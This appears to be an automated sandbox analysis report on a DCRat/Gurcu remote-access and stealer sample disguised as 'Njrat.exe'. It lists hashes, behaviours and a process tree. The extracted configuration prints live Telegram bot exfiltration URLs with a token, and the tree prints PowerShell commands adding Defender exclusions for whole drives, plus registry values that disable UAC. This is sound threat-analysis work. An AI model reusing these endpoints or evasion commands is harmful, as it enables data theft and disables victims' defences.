dcrat | d9dc76fcec48e47d8a10afa9ee40af17b856bff408bbc3eb36f5d362364a8d4c

Analysis

max time kernel
1799s
max time network
1801s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
26-06-2024 14:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Njrat.exe
Size

3.1MB
MD5

7bbb27a3b9ace5f7d403ba8d6ef58d28
SHA1

5effbe830a93770824ee60f65eac790dda1ee807
SHA256

d9dc76fcec48e47d8a10afa9ee40af17b856bff408bbc3eb36f5d362364a8d4c
SHA512

32774b5efc9a4c771ed74cb59d6e4221d4cfb92e05d18cf9d3ad53b957005cce84892ef9e563d2c4c932127dac595394e23d8bc3e2a6ab3a654acef5e24e0327
SSDEEP

49152:VbA3GVZoGDweuD4gWA7evLcjM3wwwZHFXIJ5nDWhVGUwwB3SNZts8zOqhsg:VbZDweuD4rcH9Vl65Dac7ssNj

Score

10^/10

dcrat gurcu discovery evasion execution infostealer rat spyware stealer trojan

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7254629454:AAGjOAEp2s0ZiG-YjCrzgjlow6_jHxosWUM/sendPhoto?chat_id=https://t.me/Eblan30000000_bot&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20fc2fb83bf92769559d311e245495a87f63a55213%0A%E2%80%A2%20Comment%3A%20njRAT%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20PXHSTPPU%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20191.101.209.39%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5Ccontainerperf%5Cfontdrvhost.ex

https://api.telegram.org/bot7254629454:AAGjOAEp2s0ZiG-YjCrzgjlow6_jHxosWUM/sendDocument?chat_id=https://t.me/Eblan30000000_bot&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20fc2fb83bf92769559d311e245495a87f63a55213%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.656341

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Process spawned unexpected child process 51 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4980	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3660	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4016	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4968	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3880	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3200	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1112	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2984	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1532	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4300	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4304	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1732	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1288	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2452	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4696	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3460	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4888	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3740	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2680	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1552	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4416	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	660	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	528	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4640	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	452	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	940	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1664	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4412	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2608	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4780	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3192	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2592	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3432	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2564	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4804	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	632	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3212	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4076	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1880	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5032	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4704	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4968	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	784	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4012	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1092	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1704	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2896	888	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	572	888	schtasks.exe	97

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	fontdrvhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	fontdrvhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	fontdrvhost.exe

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral3/files/0x0007000000023635-10.dat	dcrat
behavioral3/memory/904-13-0x0000000000010000-0x00000000002F2000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4312	powershell.exe
1732	powershell.exe
3400	powershell.exe
1832	powershell.exe
4304	powershell.exe
2272	powershell.exe
1908	powershell.exe
2784	powershell.exe
1288	powershell.exe
2708	powershell.exe
1568	powershell.exe
4300	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	Njrat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	Hyperblockport.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	fontdrvhost.exe

Executes dropped EXE 34 IoCs

pid	Process
904	Hyperblockport.exe
5220	fontdrvhost.exe
4348	sysmon.exe
5164	unsecapp.exe
2100	RuntimeBroker.exe
1512	lsass.exe
4832	backgroundTaskHost.exe
6000	SearchApp.exe
6016	sysmon.exe
1776	msedge.exe
6028	dllhost.exe
2948	Idle.exe
3208	unsecapp.exe
2784	RuntimeBroker.exe
1008	fontdrvhost.exe
3344	System.exe
3424	sysmon.exe
6100	lsass.exe
3636	backgroundTaskHost.exe
3580	unsecapp.exe
5540	RuntimeBroker.exe
392	SearchApp.exe
1440	msedge.exe
5388	sysmon.exe
4572	dllhost.exe
1600	Idle.exe
4776	lsass.exe
4764	unsecapp.exe
3504	RuntimeBroker.exe
3668	sysmon.exe
5888	fontdrvhost.exe
1868	System.exe
944	backgroundTaskHost.exe
5236	SearchApp.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	fontdrvhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Hyperblockport.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fontdrvhost.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
30	ipinfo.io
31	ipinfo.io

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Multimedia Platform\6203df4a6bafc7	Hyperblockport.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\29c1c3cc0f7685	Hyperblockport.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\it-IT\6ccacd8608530f	Hyperblockport.exe
File created	C:\Program Files\Uninstall Information\9e8d7a4ca61bd9	Hyperblockport.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\msedge.exe	Hyperblockport.exe
File created	C:\Program Files\Windows Multimedia Platform\lsass.exe	Hyperblockport.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe	Hyperblockport.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\it-IT\Idle.exe	Hyperblockport.exe
File created	C:\Program Files\Uninstall Information\RuntimeBroker.exe	Hyperblockport.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\61a52ddc9dd915	Hyperblockport.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\INF\wsearchidxpi\Idle.exe	Hyperblockport.exe
File created	C:\Windows\INF\wsearchidxpi\6ccacd8608530f	Hyperblockport.exe
File created	C:\Windows\diagnostics\system\WindowsMediaPlayerConfiguration\Idle.exe	Hyperblockport.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings	Njrat.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings	Hyperblockport.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 51 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
632	schtasks.exe
4304	schtasks.exe
4416	schtasks.exe
2332	schtasks.exe
4888	schtasks.exe
660	schtasks.exe
2564	schtasks.exe
3200	schtasks.exe
528	schtasks.exe
4016	schtasks.exe
3212	schtasks.exe
4076	schtasks.exe
5032	schtasks.exe
4012	schtasks.exe
3740	schtasks.exe
1732	schtasks.exe
2608	schtasks.exe
4980	schtasks.exe
1288	schtasks.exe
2452	schtasks.exe
4968	schtasks.exe
1704	schtasks.exe
2984	schtasks.exe
940	schtasks.exe
4804	schtasks.exe
4300	schtasks.exe
3432	schtasks.exe
572	schtasks.exe
1112	schtasks.exe
4412	schtasks.exe
1880	schtasks.exe
3192	schtasks.exe
2592	schtasks.exe
1532	schtasks.exe
1664	schtasks.exe
3880	schtasks.exe
3660	schtasks.exe
4968	schtasks.exe
3152	schtasks.exe
1500	schtasks.exe
2680	schtasks.exe
4704	schtasks.exe
784	schtasks.exe
1092	schtasks.exe
4696	schtasks.exe
1552	schtasks.exe
4780	schtasks.exe
2896	schtasks.exe
3460	schtasks.exe
4640	schtasks.exe
452	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
2272	powershell.exe
2272	powershell.exe
1568	powershell.exe
1568	powershell.exe
1288	powershell.exe
1288	powershell.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
904	Hyperblockport.exe
1732	powershell.exe
1732	powershell.exe
2784	powershell.exe
2784	powershell.exe
3400	powershell.exe
3400	powershell.exe
1832	powershell.exe
1832	powershell.exe
1908	powershell.exe
1908	powershell.exe
2708	powershell.exe
2708	powershell.exe
4304	powershell.exe
4304	powershell.exe
1288	powershell.exe
4300	powershell.exe
4300	powershell.exe
3400	powershell.exe
4312	powershell.exe
4312	powershell.exe
2272	powershell.exe
4304	powershell.exe
2784	powershell.exe
1568	powershell.exe
1732	powershell.exe
4300	powershell.exe
1908	powershell.exe
2708	powershell.exe
1832	powershell.exe
4312	powershell.exe
5220	fontdrvhost.exe
5220	fontdrvhost.exe
5220	fontdrvhost.exe
5220	fontdrvhost.exe
5220	fontdrvhost.exe
5220	fontdrvhost.exe
5220	fontdrvhost.exe
5220	fontdrvhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5220	fontdrvhost.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	904	Hyperblockport.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	3400	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	5220	fontdrvhost.exe
Token: SeBackupPrivilege	5124	vssvc.exe
Token: SeRestorePrivilege	5124	vssvc.exe
Token: SeAuditPrivilege	5124	vssvc.exe
Token: SeDebugPrivilege	4348	sysmon.exe
Token: SeDebugPrivilege	5164	unsecapp.exe
Token: SeDebugPrivilege	2100	RuntimeBroker.exe
Token: SeDebugPrivilege	1512	lsass.exe
Token: SeDebugPrivilege	4832	backgroundTaskHost.exe
Token: SeDebugPrivilege	6000	SearchApp.exe
Token: SeDebugPrivilege	6016	sysmon.exe
Token: SeDebugPrivilege	1776	msedge.exe
Token: SeDebugPrivilege	6028	dllhost.exe
Token: SeDebugPrivilege	2948	Idle.exe
Token: SeDebugPrivilege	3208	unsecapp.exe
Token: SeDebugPrivilege	2784	RuntimeBroker.exe
Token: SeDebugPrivilege	1008	fontdrvhost.exe
Token: SeDebugPrivilege	3344	System.exe
Token: SeDebugPrivilege	3424	sysmon.exe
Token: SeDebugPrivilege	6100	lsass.exe
Token: SeDebugPrivilege	3636	backgroundTaskHost.exe
Token: SeDebugPrivilege	3580	unsecapp.exe
Token: SeDebugPrivilege	5540	RuntimeBroker.exe
Token: SeDebugPrivilege	392	SearchApp.exe
Token: SeDebugPrivilege	1440	msedge.exe
Token: SeDebugPrivilege	5388	sysmon.exe
Token: SeDebugPrivilege	4572	dllhost.exe
Token: SeDebugPrivilege	1600	Idle.exe
Token: SeDebugPrivilege	4776	lsass.exe
Token: SeDebugPrivilege	4764	unsecapp.exe
Token: SeDebugPrivilege	3504	RuntimeBroker.exe
Token: SeDebugPrivilege	3668	sysmon.exe
Token: SeDebugPrivilege	5888	fontdrvhost.exe
Token: SeDebugPrivilege	1868	System.exe
Token: SeDebugPrivilege	944	backgroundTaskHost.exe
Token: SeDebugPrivilege	5236	SearchApp.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5220	fontdrvhost.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 3324 wrote to memory of 2120	3324	Njrat.exe	90
PID 3324 wrote to memory of 2120	3324	Njrat.exe	90
PID 3324 wrote to memory of 2120	3324	Njrat.exe	90
PID 2120 wrote to memory of 4180	2120	WScript.exe	99
PID 2120 wrote to memory of 4180	2120	WScript.exe	99
PID 2120 wrote to memory of 4180	2120	WScript.exe	99
PID 4180 wrote to memory of 904	4180	cmd.exe	101
PID 4180 wrote to memory of 904	4180	cmd.exe	101
PID 904 wrote to memory of 4312	904	Hyperblockport.exe	154
PID 904 wrote to memory of 4312	904	Hyperblockport.exe	154
PID 904 wrote to memory of 4300	904	Hyperblockport.exe	155
PID 904 wrote to memory of 4300	904	Hyperblockport.exe	155
PID 904 wrote to memory of 2272	904	Hyperblockport.exe	156
PID 904 wrote to memory of 2272	904	Hyperblockport.exe	156
PID 904 wrote to memory of 4304	904	Hyperblockport.exe	157
PID 904 wrote to memory of 4304	904	Hyperblockport.exe	157
PID 904 wrote to memory of 1568	904	Hyperblockport.exe	158
PID 904 wrote to memory of 1568	904	Hyperblockport.exe	158
PID 904 wrote to memory of 1732	904	Hyperblockport.exe	159
PID 904 wrote to memory of 1732	904	Hyperblockport.exe	159
PID 904 wrote to memory of 1832	904	Hyperblockport.exe	160
PID 904 wrote to memory of 1832	904	Hyperblockport.exe	160
PID 904 wrote to memory of 2708	904	Hyperblockport.exe	161
PID 904 wrote to memory of 2708	904	Hyperblockport.exe	161
PID 904 wrote to memory of 1288	904	Hyperblockport.exe	162
PID 904 wrote to memory of 1288	904	Hyperblockport.exe	162
PID 904 wrote to memory of 3400	904	Hyperblockport.exe	163
PID 904 wrote to memory of 3400	904	Hyperblockport.exe	163
PID 904 wrote to memory of 2784	904	Hyperblockport.exe	164
PID 904 wrote to memory of 2784	904	Hyperblockport.exe	164
PID 904 wrote to memory of 1908	904	Hyperblockport.exe	165
PID 904 wrote to memory of 1908	904	Hyperblockport.exe	165
PID 904 wrote to memory of 4704	904	Hyperblockport.exe	178
PID 904 wrote to memory of 4704	904	Hyperblockport.exe	178
PID 4704 wrote to memory of 5764	4704	cmd.exe	180
PID 4704 wrote to memory of 5764	4704	cmd.exe	180
PID 4704 wrote to memory of 5220	4704	cmd.exe	183
PID 4704 wrote to memory of 5220	4704	cmd.exe	183
PID 5220 wrote to memory of 5536	5220	fontdrvhost.exe	184
PID 5220 wrote to memory of 5536	5220	fontdrvhost.exe	184
PID 5220 wrote to memory of 5608	5220	fontdrvhost.exe	185
PID 5220 wrote to memory of 5608	5220	fontdrvhost.exe	185

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Hyperblockport.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	fontdrvhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	fontdrvhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	fontdrvhost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Njrat.exe
"C:\Users\Admin\AppData\Local\Temp\Njrat.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3324
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\containerperf\9nepdzd6Yg.vbe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\containerperf\MJF5L0LGrR45RopQV75MoqBbC.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4180
  - - C:\containerperf\Hyperblockport.exe
      "C:\containerperf\Hyperblockport.exe"
      4⤵
      UAC bypass
      Checks computer location settings
      Executes dropped EXE
      Checks whether UAC is enabled
      Drops file in Program Files directory
      Drops file in Windows directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:904
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4312
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4300
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerperf/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2272
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4304
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1568
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1732
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\l7sOuyFVLN.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4704
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:5764
      - C:\containerperf\fontdrvhost.exe
        
        "C:\containerperf\fontdrvhost.exe"
        6⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:5220
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\140e8bcf-5b16-48c2-a480-7ab12e80722e.vbs"
        7⤵
        
        PID:5536
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e60d99d-303b-4e2d-b798-0bae83d12f62.vbs"
        7⤵
        
        PID:5608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
